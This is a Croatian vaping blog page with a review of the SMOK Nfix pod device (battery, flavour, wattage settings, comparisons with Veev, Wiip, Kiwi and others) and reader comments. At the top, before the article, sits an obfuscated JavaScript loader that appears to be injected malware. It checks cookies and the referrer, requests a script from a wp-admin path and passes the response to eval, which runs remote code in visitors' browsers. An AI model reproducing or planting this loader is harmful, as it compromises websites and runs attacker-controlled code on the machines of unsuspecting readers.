;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Smok NFIX

SMOK Nfix kit – kratak review

Zadnje vrijeme baš istražujemo što nudi tržište POD-ova tako nam je u ruke došao i SMOK Nfix. Koji su to “popularniji” uređaji te što oni nude vaperu kao korisniku, novom ili starom – svejedno.

Dok se mi tako zabavljamo istraživanjem i isprobavanjem no name i name brandova slušamo priče o zbivanjima preko granice.

Vodi se žestoka borba protiv vapea i na žalost vape gubi. Što mi možemo napraviti? Pa ništa posebno. Možemo se nadati da će netko vidjeti što rade u Velikoj Britaniji i uzeti to za primjer, no ruku na srce – to radi samo Velika Britanija – teško da će njih itko pratit u ičem.

Prosječan korisnik niti ne zna što se zbiva i zašto. Pokušaj objašnjavanja situacije zvuči kao paranoja. “Lobisti”, “igra novca”, “big tobacco” i tako dalje. Počinjemo sami sebi zvučati kao teoretičari zavjere.

Možda ćemo morati svi preči na POD uređaje.

Pričaju da i Englezi masovno koriste POD uređaje. To je kao jedina prihvatljiva i dostupna tehnologija. Dok s jedne strane govorimo o tome da nema toliko pomaka u standardnoj vape industriji – MOD-ovi su više manje s istim funkcijama, atomizeri su više manje na istu shemu – mogli bi reći “postignut je nekakav standard”. Teško da neki MOD danas može biti katastrofalno loš. Svi će raditi to što se od njih zahtjeva, samo je pitanje u kojoj formi, boji i koliko dugo. Ostalo je zanemarivo. Slično se može reći i za atomizere.

No u POD uređajima vidimo svašta. Katastrofalno loše i iznenađujuće dobre.

U tu kategoriju “iznenađujuće dobrih” spada i SMOK Nfix.

Da ne bi pisali nebuloze, i da se ne zasniva sve samo na našem mišljenju krenuli smo malo u istraživanje i što internet kaže o njima, što kažu neki poznatiji revieweri. Ono što doznajemo je da u principu potvrđuju naše mišljenje.

SMOK Nfix – iznenađujuće dobar uređaj

SMOK NFix
SMOK NFix

Svi do sad testirati i probani uređaji (o nekima nismo niti pričali/pisali) nisu nešto što bi po našem mišljenju moglo u potpunosti zamijeniti standardni vape nama – korisnicima koji parimo već duži period i koji smo se navikli na cjelodnevno trajanje baterije, dopunu tekućina, niske cijene održavanja itd.

No onda naletite na SMOK Nfix.

Na prvi pogled standardan POD. Malo ga od ostalih razlikuje opcija podešavanja snage, no po formi i svemu ostalome izgleda kao najobičniji “USB stick” POD. No ovaj radi i radi dobro. Toliko dobro da se mi sami možemo vidjeti kao korisnici ovog uređaja.

Da se razumijemo, nikada ništa neće zamijeniti vašeg “unicorna” – taj mistični vape setup koji čini tipa VaporGiant V6 i koji je upravo vama najbolji. No ako ste otvoreni i spremni za malo kompromisa…

Kompromis

Uspoređivati POD sa nekim regularnim vape uređajem možda i nije fer. Nove korisnike to u principu ne interesira – jer nemaju “regularni vape uređaj” – no one koji imaju ovo bi moglo interesirati.

Kompromisi koje morate učiniti su:

Baterija će krajati kraće

Baterija je cca 600 mAh. Iako je deklarirano 700, vidimo po testovima da je to češće malo preko 600mAh.

Početnicima koji ne koriste vape je to super, jer i tih 600+ je još uvijek 200 mAh više nego što nude neki slični uređaji (slični dimenzijom).
Regularnim korisnicima to znači dva ako ne i tri puta dnevno stavljanje uređaja na punjač.
Dobra vijest je to da se uređaj puni na USB C. Ako ga stavite na dobar punjač (tipa onaj od mobitela 5A) uređaj će se napuniti u roku od 45 minuta.

Oblaci i okus

Atomizer/patronu ovog uređaja nadopunjete sami – nešto na što su korisnici regularnih uređaja navikli no početnici često puta i ne (oni koji koriste zatvorene sisteme tipa Wiip ili Veev).

Rupica kroz koju nadopunjujete e tekućinu je dovoljno velika i za pipetu 120 ml bočice, POD se lako puni bez izljevanja tekućine.

Okus koji POD daje je rame uz rame sa nekim standardnijim atomizerima tipa Siren 2. Okus svih vrsti tekućina je bolja nego što daje primjerice Berserker. Količina pare je tu, ako i nije zadovoljavajuća – lako pojačate snagu uređaja.

Uređaj trpi sve vrste tekućina. Od 80:20 pa na niže. Možda se malo mući sa 80:20, pa bi bilo preporučljivo 70:30 ili 60:40. Za početnike je ovo apsolutno nebitna informacija – samo točite što nađete :).

Prednosti SMOK Nfix

Mala dimenzija je očito prednost za sve vrste korisnika. Možete ga ponjeti bilo gdje i povući paru u bilo kojoj situaciji.

Mogućnost podešavanja snage rada uređaja. Nešto na što su napredniji korisnici navikli – podesite W snagu i imate više pare i veće oblake. Naša preporučena “startna pozicija” je 13W – smatramo da ispod toga uređaj i ne radi možda najbolje. Iako bi se dao koristiti i na 10W ako nekome tako paše. U principu je to individualno – ovo je samo smjernica.

Kliknete tri puta na power button i ulazite u opciju podešavanja snage – idući klik povećat će W za +1. Ako ostavite i ne dirate uređaj nakon 3 sekunde će se postavka pohraniti.

Samo zapamtite – više snage = više oblaka no isto tako i brža potrošnja baterije.

Također imajte na umu da uređaj možda neće moći konstantno isporučivati 25W već dok je baterija puna, nakon toga će uređaj bacati poruku da je baterija slaba. Tada morate ili sniziti snagu i nastaviti koristiti uređaj na manjoj snazi ili nadopuniti uređaj. S obzirom da smo mi testirali uređaj na 13W, baterija je došla do 1% i morali smo je nadopuniti.

Dakle taj cut off baterije se dešava samo na većim snagama.

Ono što bi moglo biti zanimljivo određenom broju korisnika je brojač puffova. On se resetira sam svaki puta kad maknete atomizer / patronu POD uređaja, no tako možete pratiti koliko ste koristili uređaj.

Što se tiće prozračnosti uređaja, on je više RDL. Dakle dosta otvoreni MTL. No caka je da ima dvije rupice za zrak bočno postavljene. Sad ne znamo dal je to namjerno ili slučajno al mi se dosta puta desilo dok držimo uređaj da smo slučajno prekrili jednu od rupica čime uređaj postaje čisti MTL…dakle samo je stvar držanja. Fičr ili fail?

Prednosti i nedostaci SMOK Nfix spram nedavno korištenih uređaja

Veev – SMOK Nfix daje puniju, topliju paru te daleko intenzivniju aromu. Može se nadopunjavati tako da je trošak korištenja tri puta niži. Opcija reguliranja snage uređaja što Veev nema. Još jedan plus je to što Nfix ima jaču bateriju odnosno duže traje.

Wiip – SMOK Nfix ipak daje puniju i topliju paru. Intenzitet arome je tu negdje no sa Nfix-om možete koristiti bilo koje tekućine uključujući i one na freebase nikotin, dok kod wiipa ne možete. Uz to ima duže trajanje baterije i opciju brzog punjenja putem USB C punjača što Wiip nema. Cijena održavanja i korištenja Nfixa je također niža.

Kiwi parilica – Nfix daje puno kvalitetniju aromu svih tekućina. Dok je sama punoća i toplina pare tu negdje, aroma je daleko daleko bolja. Nfix u usporedbi gubi na trajanju baterije zahvaljujući Kiwi powerbanku no pruža mogućnost podešavanja snage i uživanje u većim oblacima pare – ako je nekom to bitno. Nfix je daleko manji (ako se gleda Kiwi sa powerbankom). Jedna od glavnih prednosti Kiwi parilice je to što zavibrira svakih 20 povlačenja no ovdje na Nfixu imate brojčani prikaz – pa ne morate pamtiti koliko puffva ste napravili ili kada je zadnji puta zavibrirao :D Eventualna prednost Kiwi-a je mekani usnik, no otom potom. No SMOK Nfix je dostupan u svim trgovinama dok Kiwi isključivo u Parilici.

Endura – Endura pobjeđuje jedino u segmentu kapaciteta baterije dok gubi u svim ostalim segmentima pa čak i kvaliteti okusa. Po našem mišljenju okus Nfixa je bolji. Svi ostali parametri idu u korist Nfixu – regulacija snage, dimenzije itd.

Kroma Z – Nfix je kao “Kroma Z” u manjem kućištu. S tim “manjim kućištem” dolazi kraće trajanje baterije…ali je razlika u dimenziji 1:3. Iako nismo imali problema sa grgljanjem i curenjem Krome Z – čujemo po pričanjima kupaca da se to ipak dešava. Kod nfixa to nismo doživjeli unutar ovog korištenja od cca 10 tak dana.

Zaključak

Da se nas pita – mi bi ovaj uređaj preporučili svima. Bilo da vam služio kao sekundarni uređaj uz postoječi regularni vape ili novim korisnicima kao fantastičan (po nama najbolji) prvi uređaj.

Ukoliko ste Direct Lung korisnik regularnog vapea i sad ćete odmahnuti s rukom kao “ma ne pada mi na pamet” – naš savijet je da se pokušate prebaciti na MTL čim prije jer u svjetlu ovih događanja u svijetu vapea ne bi se čudili da ovakvo nešto kao što je SMOK Nfix postane standard.

Cijena SMOK Nfixa u momentu pisanja članka je 229 kn u trgovini ecigarete.hr
Cijena dodatne patrone je 25kn na istom shopu.

Pratite nas svaki petak na live streamu s početkom u 21:00 na VaperPub YouTube kanalu.

Choose your Reaction!
 • Da, čini se da je dobar uređaj. Svakako bolji od Wiipa. Kad smo kod Wiipa, eto i moja punica je dobila na poklon uređaj od moje kćeri. Sad su to žive komedije, prvo jadna nije znala kako povlačiti puffove pa sam joj objašnjavao, a sad sam ja glavni i odgovorni za ponovno punjenje cartrigea :D I što se samog Smok tiče, vjerovatno će mi frend prepustiti Smok Nord 4 uskoro, koji će mi služiti za lagani backup u slučaju da mi jedan od 2 moda koja imam počne štekati. Da, nije baš adekvatna zamjena, ali kao flaster će biti ok.

 • Savjet za Qark i sve buduće korisnike brojač pufova se neće resetirat ako prije vađenja poda ugasite Nfix (5 brzih pritisaka na dugme gasi i pali Nfix), napunite vratite pod i upalite, brojač pufova nastavlja gdje je stao! 👍
  Nadalje prve verzije Nfixa imaju 2 rupice za zrak i da uređaj je dosta protočan, kome ne paše dosta je prekrit prstom jednu rupicu i već je to druga priča. Nadalje druga linija od 3 nove boje koje je SMOK izbacio dolazi samo sa jednom rupicom, valjda su napravili neki tihi update s time, ali meni je odličan i sa 2 rupice u svakom slučaju nakon 2 tjedna korištenja, s obzirom da sam koristio i legendarni SMOK Infinix 6 mjeseci kad je izašao ovo je definitivno veliko poboljšanje za SMOK liniju POD-ova! 👍👍👍👍

  • da to znam, zaboravih napisat :D
   u principu gledam da novi tank novi brojač sistem…što je ok po meni :D

   al ako netko ne želi resetirat – napravite ovak kak je Shark napisal :D

 • Nekako mi mali podici izgledaju tipa, isprazni pa baci, jednokratni uredaji, no s obzirom na stanje, super je imati ovakve informacije. Ndadm se da se ubrzo na nasem trzistu nece nista drasticno mijenjati, i da cemo i dalje moci sami miksati tekucine.
  Pitanje. Ako kiwi ima powerbank, zasto ga nebi mogao imati i ovaj uredaj. Na trzistu ima brdo uredaja za bunjenje mobitela. Pa ako posluzi za mob. moze i za pod?? Ili mozda ne moze??

  • Powerbank od Kiwia je za Kiwi… no sa ovim uređajem možete kupiti bilo koji drugi powerbank. Čak i Muler ima solidne powerbankove od 10 000 mAh (ja koristim taj) za cca 100-150 kn. Ako se ovako nešto upari sa powerbankom od 10 000 mAh onda to postaje sasvim druga priča :D

   Doduše možda nije vizualno prihvatljivo kao Kiwi kombinacija, ali 10 000 mAh će napuniti vaš mobitel i POD (jedno 5-6 puta)

   • @QUARK Koji pod preporučujete? Vidim da postoji 0.8 ohm mesh, DC 0.8 ohm i SC 1.0 ohm. U trgovini ecigarete.hr u ponudi je 0.8 ohm mesh i SC 1.0. Što je od ta dva opcija za MTL? Hvala

    • dok dočekaš Hrvoja, evo ti brzi odgovor – gotovo uvijek ti je bliže mtl-u grijač koji ima veći otpor, u ovom slučaju 1.0 (nije 100% pravilo, ali uglavnom je tako)

  • naravno da možeš puniti bilo koji pod i čak mod na gotovo bilo koji power bank (bitno je da je kapacitet power banka veći od kapaciteta onog što puniš jer, neke modove možeš koristiti kao power bank). stvar je kiwija što ima vlastiti, fensy šmensy power bank i možeš ga koristiti čak i dok je unutar power banka. :)

   • Ma bitno da ga mozes napunit ako ides negdje na duze vremena. A Pepco ima slatke modele…jednorog ili djed bozicnjak, a cijena im je cca 70kn. 😁😁

   • A sto se tice kiwia, ne mogu reci da ga nisam pozelila, bas zato jer je fensi smensi, ali nakon recenzije, odustala sam. Ipak mi je bitnije da osjetim ono kaj parim, a ne da samo lijepo izgleda. A kako sam ljubitelj vise kremastih aromaca, onda kiwi preskacem

  • Podovi su od 3 ml, ja ih punim 3-4 pita dnevno i ovaj prvi pod je nakon 2 tjedna korištenja još uvijek kao prvi dan! Top! 👍

Leave a Comment